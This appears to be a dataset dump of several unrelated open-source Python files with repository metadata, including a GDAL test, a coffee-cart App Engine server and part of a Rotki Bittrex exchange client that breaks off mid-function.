if out2_ds.GetRasterBand(1).GetMaskBand().Checksum() != 0:
print(out2_ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
out2_ds = None
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
gdaltest_list = [
kea_init,
kea_1,
kea_2,
kea_3,
kea_4,
kea_5,
kea_6,
kea_7,
kea_8,
kea_9,
kea_10,
kea_11,
kea_12,
kea_13,
kea_14
]
if __name__ == '__main__':
gdaltest.setup_run( 'kea' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| [
"even.rouault@mines-paris.org"
] | even.rouault@mines-paris.org |
3e9416daec97cca67eb1ab3bda5bf27948ea697a | c720e9298891502a94a7086e7c6908d2551ff254 | /tests/__init__.py | 09c53e834481a97d3ffde68608519b5ac92e2366 | [
"MIT"
] | permissive | mckinsel/dcplib | 8d304e95dbf31927c482bd18daf4a2def6f7382b | 93f0e6c20a2e2a3ddcdfa6fe1a367ae1364fbeb5 | refs/heads/master | 2020-09-01T16:03:35.225816 | 2019-10-28T16:51:02 | 2019-10-28T16:51:02 | 219,000,310 | 0 | 0 | null | 2019-11-01T14:24:25 | 2019-11-01T14:24:25 | null | UTF-8 | Python | false | false | 932 | py | import os
class EnvironmentSetup:
"""
Set environment variables.
Provide a dict of variable names and values.
Setting a value to None will delete it from the environment.
"""
def __init__(self, env_vars_dict):
self.env_vars = env_vars_dict
self.saved_vars = {}
def enter(self):
for k, v in self.env_vars.items():
if k in os.environ:
self.saved_vars[k] = os.environ[k]
if v:
os.environ[k] = v
else:
if k in os.environ:
del os.environ[k]
def exit(self):
for k, v in self.saved_vars.items():
os.environ[k] = v
def __enter__(self):
self.enter()
def __exit__(self, type, value, traceback):
self.exit()
def fixture_file_path(filename):
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'fixtures', filename))
| [
"sam@sampierson.com"
] | sam@sampierson.com |
4c8a5ec0a1babe7f7faaccd7a56cf6452644aa9e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02783/s364760222.py | 56095ba287f4d078faedb65eb7b8df8402523e7c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import sys
#import string
#from collections import defaultdict, deque, Counter
#import bisect
#import heapq
#import math
#from itertools import accumulate
#from itertools import permutations as perm
#from itertools import combinations as comb
#from itertools import combinations_with_replacement as combr
#from fractions import gcd
#import numpy as np
stdin = sys.stdin
sys.setrecursionlimit(10 ** 7)
MIN = -10 ** 9
MOD = 10 ** 9 + 7
INF = float("inf")
IINF = 10 ** 18
def solve():
#n = int(stdin.readline().rstrip())
h,a = map(int, stdin.readline().rstrip().split())
#l = list(map(int, stdin.readline().rstrip().split()))
#numbers = [[int(c) for c in l.strip().split()] for l in sys.stdin]
#word = [stdin.readline().rstrip() for _ in range(n)]
#number = [[int(c) for c in stdin.readline().rstrip()] for _ in range(n)]
#zeros = [[0] * w for i in range(h)]
ans = h // a
if h%a == 0:
print(ans)
else:
print(ans + 1)
if __name__ == '__main__':
solve()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
8f1a6d780bd0edce2d520e13dad88a8227254da9 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v2/model/confluent_account_resource_attributes.py | 17ce380b94bbc1ddf35e1700b093ca27a39b4d1d | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 2,096 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from typing import List, Union
from datadog_api_client.model_utils import (
ModelNormal,
cached_property,
unset,
UnsetType,
)
class ConfluentAccountResourceAttributes(ModelNormal):
@cached_property
def openapi_types(_):
return {
"enable_custom_metrics": (bool,),
"id": (str,),
"resource_type": (str,),
"tags": ([str],),
}
attribute_map = {
"enable_custom_metrics": "enable_custom_metrics",
"id": "id",
"resource_type": "resource_type",
"tags": "tags",
}
def __init__(
self_,
resource_type: str,
enable_custom_metrics: Union[bool, UnsetType] = unset,
id: Union[str, UnsetType] = unset,
tags: Union[List[str], UnsetType] = unset,
**kwargs,
):
"""
Attributes object for updating a Confluent resource.
:param enable_custom_metrics: Enable the ``custom.consumer_lag_offset`` metric, which contains extra metric tags.
:type enable_custom_metrics: bool, optional
:param id: The ID associated with a Confluent resource.
:type id: str, optional
:param resource_type: The resource type of the Resource. Can be ``kafka`` , ``connector`` , ``ksql`` , or ``schema_registry``.
:type resource_type: str
:param tags: A list of strings representing tags. Can be a single key, or key-value pairs separated by a colon.
:type tags: [str], optional
"""
if enable_custom_metrics is not unset:
kwargs["enable_custom_metrics"] = enable_custom_metrics
if id is not unset:
kwargs["id"] = id
if tags is not unset:
kwargs["tags"] = tags
super().__init__(kwargs)
self_.resource_type = resource_type
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
66491e93bac49e0f9d5e1cb7578aace7fd501279 | 7694af8a805b20f2d9f435b381d8cb5e59bffa50 | /apps/landing/templatetags/cart_template_tags.py | c7596e8ad09f84ee8777f8d9a432df147b2dd23a | [] | no_license | RympeR/dindex_landing | b0e1115a7009e25072369077a6854b93f1111054 | cb422bb148a2b5793e0ba13c9525dd0fd64a6f09 | refs/heads/main | 2023-06-23T20:16:14.908847 | 2021-07-22T14:05:29 | 2021-07-22T14:05:29 | 380,458,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from django import template
register = template.Library()
@register.filter
def post_categories(value):
return 0
| [
"georg.rashkov@gmail.com"
] | georg.rashkov@gmail.com |
fe5bc6143a588be282570b8bc834be40068790f1 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnn1329.py | dd7710a727f8089d0e50e81562f7df4f484b794b | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 121 | py | ii = [('UnitAI.py', 1), ('FitzRNS3.py', 1), ('DaltJMA.py', 1), ('WheeJPT.py', 1), ('MereHHB3.py', 1), ('MereHHB2.py', 2)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
5a0d3f5f22f67c39c6323697a44bd6491d06ab42 | a5455dbb01687ab031f6347306dbb5ccc3c0c162 | /第一阶段/day13/code/mymod3.py | bb84da638d9bdc4dc9f09578b20fc403ed12fb85 | [] | no_license | zuobing1995/tiantianguoyuan | 9ff67aef6d916e27d92b63f812c96a6d5dbee6f8 | 29af861f5edf74a4a1a4156153678b226719c56d | refs/heads/master | 2022-11-22T06:50:13.818113 | 2018-11-06T04:52:53 | 2018-11-06T04:52:53 | 156,317,754 | 1 | 1 | null | 2022-11-22T01:06:37 | 2018-11-06T03:02:51 | Python | UTF-8 | Python | false | false | 156 | py | # mymod3.py
# 此模块示意模块的隐藏属性
def f1():
pass
def _f2():
pass
def __f3():
pass
name1 = "abc"
_name2 = '123'
| [
"bing@163.com"
] | bing@163.com |
106306d66014bc9ec0a7130fe2f9fb6005498a20 | e170f20ffd27afbf6ec1ef8f8d4f612618ac2d68 | /python3/koans/about_datetime.py | 1560055c47ae537856f6541e3e32d023ba741205 | [
"MIT"
] | permissive | AkrutiPoshatwar/python_training | 16818e81d151d4ae317caccbc1e2e8d03a53f980 | 258f71310ef4cc57fc0f989aa94cafdc0f53d907 | refs/heads/akruti | 2022-12-06T09:48:09.874415 | 2020-09-02T04:53:35 | 2020-09-02T04:53:35 | 289,927,962 | 0 | 0 | MIT | 2020-08-26T08:11:05 | 2020-08-24T12:55:49 | Python | UTF-8 | Python | false | false | 190 | py | from datetime import date
from datetime import timedelta
d1 = date(2020, 9, 1)
i=0
while i < 5:
day = [d1 + timedelta(days = 5)]
d1 = d1 + timedelta(days=5)
i+=1
print(day) | [
"akruti.poshatwar@noovosoft.com"
] | akruti.poshatwar@noovosoft.com |
733a86b41dc42f3b983bd0646cf83dc93a11e93f | 9a7526401349d6004a0ffb94163e75b368e064a1 | /CoffeeCartServer/main.py | b566af1d804d597083e81f53d1507102ce904538 | [] | no_license | jassimran/Coffee-Cart-App | 2ab70d3e4645be4f595b0ff923aab5f90a818616 | 0b187fa82c0cfbfa0384100d0ca2e0dd338e95c0 | refs/heads/master | 2020-03-14T02:26:37.356816 | 2018-04-28T10:27:57 | 2018-04-28T10:27:57 | 131,398,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,541 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
from webapp2 import Route
import json
import json_util
import jinja_util
import datetime
from pprint import pprint
import logging
import logging.config
from customer import Customer
from item import Item
from purchase import Purchase
from preorder import Preorder
from string import rstrip
import localdate
# read initial config file
logging.config.fileConfig('logging.conf')
log = logging.getLogger('webServer')
#########################################
######## PageHandler Functions ########
#########################################
class PageHandler(webapp2.RequestHandler):
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def renderJson(self, d):
json_txt = json.dumps(d)
self.response.headers['Content-Type'] = 'application/json; charset=UTF-8'
self.write(json_txt)
def renderStr(self, template, **params):
#params['user'] = self.user
return jinja_util.renderStr(template, **params)
def render(self, template, **kw):
self.write(self.renderStr(template, **kw))
class VIPHandler(PageHandler):
# Get VIP customer info
def get(self, uid=None):
#log.debug("Get VIP")
have_error = False
params = {}
if not uid:
self.error(404)
params['error'] = "No vip card number provided."
self.renderJson(params)
else:
self.uid = int(uid)
#make sure the user doesn't already exist
customer = Customer.byID(self.uid)
if customer:
self.renderJson(customer.asDict())
else:
self.error(404)
params['error'] = "The customer info requested could not be found."
self.renderJson(params)
# Add VIP customer
def post(self):
#log.debug("Add VIP")
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if self.checkParamsErrors(params):
params['error'] = "The information provided was incomplete or incorrect."
self.error(400)
self.renderJson(params)
else:
self.name = params['name']
self.dob = self.checkDOB(params['dob'])
self.phone = params['phone']
#make sure the user doesn't already exist
if Customer.findCustomer(self.name, self.dob, self.phone):
msg = 'That user already exists.'
error_dict = {'error': msg}
self.error(400)
self.renderJson(error_dict)
else:
customer = Customer.register(self.name, self.dob, self.phone)
self.response.set_status(201)
self.renderJson(customer.asDict())
# Edit VIP customer info
def put(self, uid=None):
#log.debug("Edit VIP")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not uid:
params['error_card_number'] = "No vip card number provided."
have_error = True
if self.checkParamsErrors(params) or have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
#make sure the user doesn't already exist
self.uid = int(uid)
customer = Customer.byID(self.uid)
if customer:
self.name = params['name']
self.dob = self.checkDOB(params['dob'])
self.phone = params['phone']
new_info_cust = Customer.findCustomer(self.name, self.dob, self.phone)
if not new_info_cust:
if customer.updateInfo(self.uid, name=self.name, dob=self.dob, phone=self.phone):
return_val = {"complete": "The vip account was successfully updated."}
self.renderJson(return_val)
else:
msg = 'The info provided matches that of an existing customer.'
error_dict = {'error': msg}
self.error(400)
self.renderJson(error_dict)
else:
msg = 'The vip card number provided does not exist.'
error_dict = {'error': msg}
self.error(404)
self.renderJson(error_dict)
# Delete VIP customer
def delete(self, uid=None):
#log.debug("Delete VIP")
have_error = False
params = {}
if not uid:
params['error'] = "No vip card number provided."
self.error(400)
self.renderJson(params)
else:
self.uid = int(uid)
customer = Customer.byID(self.uid)
if customer:
if customer.deleteCustomer(self.uid):
return_val = {"complete": "The vip account given was successfully deleted."}
self.response.set_status(204)
self.renderJson(return_val)
else:
error_dict = {'error': 'The vip card number provided does not exist.'}
self.error(404)
self.renderJson(error_dict)
def checkParamsErrors(self, params):
have_error = False
if not 'name' in params.keys() or params['name'] == "":
params['error_name'] = "No name provided."
have_error = True
if not 'dob' in params.keys() or params['dob'] == "":
params['error_dob'] = "No date of birth provided."
have_error = True
elif not self.checkDOB(params['dob']):
params['error_dob'] = "Invalid date of birth provided."
have_error = True
if not 'phone' in params.keys() or params['phone'] == "":
params['error_phone'] = "No phone number provided."
have_error = True
return have_error
def checkDOB(self, inputDOB):
split = inputDOB.split('-')
today = localdate.getToday('est')
if len(split) != 3:
return None
# Check Month
if int(split[1]) > 12 or int(split[1]) < 1:
return None
# Check Day
if int(split[2]) > 31 or int(split[2]) < 1:
return None
#Check Year
if int(split[0]) < 1900:
return None
try:
dob_date = datetime.datetime.strptime(inputDOB, "%Y-%m-%d").date()
if(today >= dob_date):
return inputDOB
except ValueError:
return None
class PurchaseHandler(PageHandler):
def post(self):
#log.debug("PurchaseHandler")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'card_number' in params.keys():
params['error_card_number'] = "No vip card number provided."
have_error = True
else:
self.customer = Customer.byID(params["card_number"])
if not self.customer:
params['error_card_number'] = "The vip card number provided does not exist."
have_error = True
self.order_list = []
if not 'item_list' in params.keys() or len(params['item_list']) == 0:
params['error_items'] = "No list of items was provided."
have_error = True
else:
error_items = "Invalid item ID provided:"
have_item_error = False
for itemID in params['item_list']:
item = Item.byID(itemID)
if not item:
error_items = error_items + " " + str(itemID) + ","
have_item_error = True
else:
self.order_list.append(item)
if have_item_error:
params['error_items'] = rstrip(error_items, ',')
have_error = True
if not 'cart_number' in params.keys():
params['error_cart_num'] = "The cart number where this order was placed was not provided."
have_error = True
if have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
purcahse = Purchase.newPurchase(self.customer, self.order_list, params["cart_number"])
if purcahse:
result = {"complete": "Order successfully added.", "purchase": purcahse.asDict()}
self.renderJson(result)
else:
params['error'] = "There was an error while completing the order."
self.error(400)
self.renderJson(params)
class PreOrderHandler(PageHandler):
def post(self):
#log.debug("PreOrderHandler")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'card_number' in params.keys():
params['error_card_number'] = "No vip card number provided."
have_error = True
else:
customer = Customer.byID(params["card_number"])
if not customer:
params['error_card_number'] = "The vip card number provided does not exist."
have_error = True
if not 'item_list' in params.keys() or len(params['item_list']) == 0:
params['error_items'] = "No list of items preordered was provided."
have_error = True
else:
error_items = "Invalid item ID provided:"
have_item_error = False
for itemID in params['item_list']:
if not Item.byID(itemID):
error_items = error_items + " " + str(itemID) + ","
have_item_error = True
if have_item_error:
params['error_items'] = rstrip(error_items, ',')
have_error = True
if not 'cart_number' in params.keys():
params['error_cart_num'] = "The cart number where the preorder was placed was not provided."
have_error = True
if not 'preorder_date' in params.keys():
params['error_preorder_date'] = "The fulfillment date for the preorder was not provided."
have_error = True
else:
self.pre_order_date = self.checkPreorderDate(params["preorder_date"])
if not self.pre_order_date:
params['error_preorder_date'] = "The fulfillment date provided for the preorder was not valid."
have_error = True
if have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
result = Preorder.newPreorder(params['card_number'], self.pre_order_date, params['item_list'], params["cart_number"])
if isinstance(result, bool):
result = {"complete": "Preorder successfully added."}
self.renderJson(result)
else:
params['error'] = "There was an error while completing the preorder."
params['error_items'] = result
self.error(400)
self.renderJson(params)
def checkPreorderDate(self, date):
split = date.split('-')
today = localdate.getToday('est')
if len(split) != 3:
return None
# Check Month
if int(split[1]) > 12 or int(split[1]) < 1:
return None
# Check Day
if int(split[2]) > 31 or int(split[2]) < 1:
return None
#Check Year
if int(split[0]) < 1900:
return None
try:
order_date = datetime.datetime.strptime(date, "%Y-%m-%d").date()
next_month = today + datetime.timedelta(31)
if(today < order_date) and (order_date < next_month):
return order_date
except ValueError:
return None
class DailyPurchaseReportHandler(PageHandler):
def get(self, cart_number=None):
result = {}
if cart_number is not None:
cart_number = int(cart_number)
result = { 'purchases': Purchase.todaysPurchases(cart_number) }
else:
result = { 'purchases': Purchase.todaysPurchases() }
self.renderJson(result)
class DailyPreOrderReportHandler(PageHandler):
def get(self, cart_number=None):
result = {}
if cart_number is not None:
cart_number = int(cart_number)
result = { 'preorders': Preorder.todaysPreorders(cart_number) }
else:
result = { 'preorders': Preorder.todaysPreorders() }
self.renderJson(result)
class GetInventoryHandler(PageHandler):
def get(self):
item_list = Item.getInventory()
self.renderJson(item_list)
class EditInventoryHandler(PageHandler):
def get(self):
self.write("Stuff")
def post(self):
log.debug("EditDessertsHandler")
self.done()
def done(self):
result = {"complete": "Action complete"}
self.renderJson(result)
class AddInventoryHandler(PageHandler):
def post(self):
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
pprint(params)
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'price' in params.keys():
params['error_price'] = "No price was provided."
have_error = True
if not 'type' in params.keys():
params['error_type'] = "No type was provided."
have_error = True
if not 'best_seller' in params.keys():
params['error_best_seller'] = "best_seller was not provided."
have_error = True
if not 'is_drink' in params.keys():
params['is_drink'] = False
item_data = [params['price'], params['type'], params['best_seller'], params['is_drink']]
added_item = Item.newItem(*item_data)
self.write("Done")
app = webapp2.WSGIApplication([
('/vip/', VIPHandler),
Route('/vip/<uid:[0-9]+>', handler=VIPHandler),
('/purchase/', PurchaseHandler),
('/preorder/', PreOrderHandler),
('/dailypurchase.json', DailyPurchaseReportHandler),
('/dailypurchase/', DailyPurchaseReportHandler),
Route('/dailypurchase/<cart_number:[0-9]+>', handler=DailyPurchaseReportHandler),
('/dailypreorder.json', DailyPreOrderReportHandler),
('/dailypreorder/', DailyPreOrderReportHandler),
Route('/dailypreorder/<cart_number:[0-9]+>', handler=DailyPreOrderReportHandler),
('/getinventory.json', GetInventoryHandler),
('/editinventory.html', EditInventoryHandler),
('/addTestInventory', AddInventoryHandler),
], debug=True)
def addTestItems():
#Populate the item database with some test cases
#Item(price, itemType, bestSeller, isDrink=False)
new_items = [ [2.00, "Coffee", False, True],
[2.00, "Coffee - Refill", False, True],
[3.00, "Chocolate Chip Cookie", False],
[4.50, "German Chocolate Cake", True],
[1.50, "Biscotti", False],
]
for item in new_items:
i = Item.newItem(*item)
def main():
# Set the logging level in the main function
# See the section on Requests and App Caching for information on how
# App Engine reuses your request handlers when you specify a main function
logging.getLogger().setLevel(logging.DEBUG)
webapp.util.run_wsgi_app(application)
if __name__ == '__main__':
main()
| [
"just.simmi@gmail.com"
] | just.simmi@gmail.com |
ee413656c69701681e6825f68e0cd9d3ab01a601 | 5f885e38973c4eddd6f086cbc7463de56fe1edab | /rotkehlchen/exchanges/bittrex.py | 1f4f76b8e4842a5a53cce1dfab102cd03bd98952 | [
"BSD-3-Clause"
] | permissive | hjorthjort/rotki | 8922372e2f1ce5bf5fab3a68f0362b50a952af81 | 5bd4cdf0c756873b41999ced6d5fd7383fb75963 | refs/heads/master | 2021-03-24T00:14:56.421344 | 2020-03-10T12:26:16 | 2020-03-10T13:43:15 | 247,496,415 | 0 | 0 | BSD-3-Clause | 2020-03-15T15:39:52 | 2020-03-15T15:39:52 | null | UTF-8 | Python | false | false | 15,927 | py | import hashlib
import hmac
import logging
import time
from json.decoder import JSONDecodeError
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union, overload
from urllib.parse import urlencode
from typing_extensions import Literal
from rotkehlchen.assets.asset import Asset
from rotkehlchen.assets.converters import asset_from_bittrex
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.errors import (
DeserializationError,
RemoteError,
UnknownAsset,
UnprocessableTradePair,
UnsupportedAsset,
)
from rotkehlchen.exchanges.data_structures import (
AssetMovement,
Trade,
get_pair_position_asset,
trade_pair_from_assets,
)
from rotkehlchen.exchanges.exchange import ExchangeInterface
from rotkehlchen.fval import FVal
from rotkehlchen.inquirer import Inquirer
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_asset_amount,
deserialize_fee,
deserialize_price,
deserialize_timestamp_from_bittrex_date,
deserialize_trade_type,
get_pair_position_str,
pair_get_assets,
)
from rotkehlchen.typing import (
ApiKey,
ApiSecret,
AssetMovementCategory,
Fee,
Location,
Timestamp,
TradePair,
)
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.interfaces import cache_response_timewise, protect_with_lock
from rotkehlchen.utils.serialization import rlk_jsonloads_dict
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
BITTREX_MARKET_METHODS = {
'getopenorders',
'cancel',
'sellmarket',
'selllimit',
'buymarket',
'buylimit',
}
BITTREX_ACCOUNT_METHODS = {
'getbalances',
'getbalance',
'getdepositaddress',
'withdraw',
'getorderhistory',
'getdeposithistory',
'getwithdrawalhistory',
}
BittrexListReturnMethod = Literal[
'getcurrencies',
'getorderhistory',
'getbalances',
'getdeposithistory',
'getwithdrawalhistory',
]
def bittrex_pair_to_world(given_pair: str) -> TradePair:
"""
Turns a pair written in the bittrex way to Rotkehlchen way
Throws:
- UnsupportedAsset due to asset_from_bittrex()
- UnprocessableTradePair if the pair can't be split into its parts
"""
if not isinstance(given_pair, str):
raise DeserializationError(
f'Could not deserialize bittrex trade pair. Expected a string '
f'but found {type(given_pair)}',
)
pair = TradePair(given_pair.replace('-', '_'))
base_currency = asset_from_bittrex(get_pair_position_str(pair, 'first'))
quote_currency = asset_from_bittrex(get_pair_position_str(pair, 'second'))
# Since in Bittrex the base currency is the cost currency, iow in Bittrex
# for BTC_ETH we buy ETH with BTC and sell ETH for BTC, we need to turn it
# into the Rotkehlchen way which is following the base/quote approach.
pair = trade_pair_from_assets(quote_currency, base_currency)
return pair
def world_pair_to_bittrex(pair: TradePair) -> str:
"""Turns a rotkehlchen pair to a bittrex pair"""
base_asset, quote_asset = pair_get_assets(pair)
base_asset_str = base_asset.to_bittrex()
quote_asset_str = quote_asset.to_bittrex()
# In bittrex the pairs are inverted and use '-'
return f'{quote_asset_str}-{base_asset_str}'
def trade_from_bittrex(bittrex_trade: Dict[str, Any]) -> Trade:
"""Turn a bittrex trade returned from bittrex trade history to our common trade
history format
Throws:
- UnknownAsset/UnsupportedAsset due to bittrex_pair_to_world()
- DeserializationError due to unexpected format of dict entries
- KeyError due to dict entries missing an expected entry
"""
amount = (
deserialize_asset_amount(bittrex_trade['Quantity']) -
deserialize_asset_amount(bittrex_trade['QuantityRemaining'])
)
timestamp = deserialize_timestamp_from_bittrex_date(bittrex_trade['TimeStamp'])
rate = deserialize_price(bittrex_trade['PricePerUnit'])
order_type = deserialize_trade_type(bittrex_trade['OrderType'])
bittrex_price = deserialize_price(bittrex_trade['Price'])
fee = deserialize_fee(bittrex_trade['Commission'])
pair = bittrex_pair_to_world(bittrex_trade['Exchange'])
quote_currency = get_pair_position_asset(pair, 'second')
log.debug(
'Processing bittrex Trade',
sensitive_log=True,
amount=amount,
rate=rate,
order_type=order_type,
price=bittrex_price,
fee=fee,
bittrex_pair=bittrex_trade['Exchange'],
pair=pair,
)
return Trade(
timestamp=timestamp,
location=Location.BITTREX,
pair=pair,
trade_type=order_type,
amount=amount,
rate=rate,
fee=fee,
fee_currency=quote_currency,
link=str(bittrex_trade['OrderUuid']),
)
class Bittrex(ExchangeInterface):
def __init__(
self,
api_key: ApiKey,
secret: ApiSecret,
database: 'DBHandler',
msg_aggregator: MessagesAggregator,
):
super(Bittrex, self).__init__('bittrex', api_key, secret, database)
self.apiversion = 'v1.1'
self.uri = 'https://bittrex.com/api/{}/'.format(self.apiversion)
self.msg_aggregator = msg_aggregator
def first_connection(self) -> None:
self.first_connection_made = True
def validate_api_key(self) -> Tuple[bool, str]:
try:
self.api_query('getbalance', {'currency': 'BTC'})
except ValueError as e:
error = str(e)
if error == 'APIKEY_INVALID':
return False, 'Provided API Key is invalid'
elif error == 'INVALID_SIGNATURE':
return False, 'Provided API Secret is invalid'
else:
raise
return True, ''
@overload
def api_query( # pylint: disable=unused-argument, no-self-use
self,
method: BittrexListReturnMethod,
options: Optional[Dict[str, Any]] = None,
) -> List[Dict[str, Any]]:
...
@overload # noqa: F811
def api_query( # noqa: F811 # pylint: disable=unused-argument, no-self-use
self,
method: Literal['getbalance'],
options: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
...
@overload # noqa: F811
def api_query( # noqa: F811 # pylint: disable=unused-argument, no-self-use
self,
method: str,
options: Optional[Dict[str, Any]] = None,
) -> Union[List[Dict[str, Any]], Dict[str, Any]]:
...
def api_query( # noqa: F811
self,
method: str,
options: Optional[Dict[str, Any]] = None,
) -> Union[List[Dict[str, Any]], Dict[str, Any]]:
"""
Queries Bittrex with given method and options
"""
if not options:
options = {}
nonce = str(int(time.time() * 1000))
method_type = 'public'
if method in BITTREX_MARKET_METHODS:
method_type = 'market'
elif method in BITTREX_ACCOUNT_METHODS:
method_type = 'account'
request_url = self.uri + method_type + '/' + method + '?'
if method_type != 'public':
request_url += 'apikey=' + self.api_key + "&nonce=" + nonce + '&'
request_url += urlencode(options)
signature = hmac.new(
self.secret,
request_url.encode(),
hashlib.sha512,
).hexdigest()
self.session.headers.update({'apisign': signature})
log.debug('Bittrex API query', request_url=request_url)
response = self.session.get(request_url)
if response.status_code != 200:
raise RemoteError(
f'Bittrex query responded with error status code: {response.status_code}'
f' and text: {response.text}',
)
try:
json_ret = rlk_jsonloads_dict(response.text)
except JSONDecodeError:
raise RemoteError(f'Bittrex returned invalid JSON response: {response.text}')
if json_ret['success'] is not True:
raise RemoteError(json_ret['message'])
result = json_ret['result']
assert isinstance(result, dict) or isinstance(result, list)
return result
def get_currencies(self) -> List[Dict[str, Any]]:
"""Gets a list of all currencies supported by Bittrex"""
result = self.api_query('getcurrencies')
return result
@protect_with_lock()
@cache_response_timewise()
def query_balances(self) -> Tuple[Optional[Dict[Asset, Dict[str, Any]]], str]:
try:
resp = self.api_query('getbalances')
except RemoteError as e:
msg = (
'Bittrex API request failed. Could not reach bittrex due '
'to {}'.format(e)
)
log.error(msg)
return None, msg
returned_balances = {}
for entry in resp:
try:
asset = asset_from_bittrex(entry['Currency'])
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found unsupported bittrex asset {e.asset_name}. '
f' Ignoring its balance query.',
)
continue
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found unknown bittrex asset {e.asset_name}. '
f' Ignoring its balance query.',
)
continue
except DeserializationError:
self.msg_aggregator.add_error(
f'Found bittrex asset with non-string type {type(entry["Currency"])}'
f' Ignoring its balance query.',
)
continue
try:
usd_price = Inquirer().find_usd_price(asset=asset)
except RemoteError as e:
self.msg_aggregator.add_error(
f'Error processing bittrex balance entry due to inability to '
f'query USD price: {str(e)}. Skipping balance entry',
)
continue
balance = {}
balance['amount'] = FVal(entry['Balance'])
balance['usd_value'] = FVal(balance['amount']) * usd_price
returned_balances[asset] = balance
log.debug(
'bittrex balance query result',
sensitive_log=True,
currency=asset,
amount=balance['amount'],
usd_value=balance['usd_value'],
)
return returned_balances, ''
def query_online_trade_history(
self,
start_ts: Timestamp,
end_ts: Timestamp,
market: Optional[TradePair] = None,
count: Optional[int] = None,
) -> List[Trade]:
options: Dict[str, Union[str, int]] = {}
if market is not None:
options['market'] = world_pair_to_bittrex(market)
if count is not None:
options['count'] = count
raw_data = self.api_query('getorderhistory', options)
log.debug('binance order history result', results_num=len(raw_data))
trades = []
for raw_trade in raw_data:
try:
trade = trade_from_bittrex(raw_trade)
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex trade with unknown asset '
f'{e.asset_name}. Ignoring it.',
)
continue
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex trade with unsupported asset '
f'{e.asset_name}. Ignoring it.',
)
continue
except UnprocessableTradePair as e:
self.msg_aggregator.add_error(
f'Found bittrex trade with unprocessable pair '
f'{e.pair}. Ignoring it.',
)
continue
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
'Error processing a bittrex trade. Check logs '
'for details. Ignoring it.',
)
log.error(
'Error processing a bittrex trade',
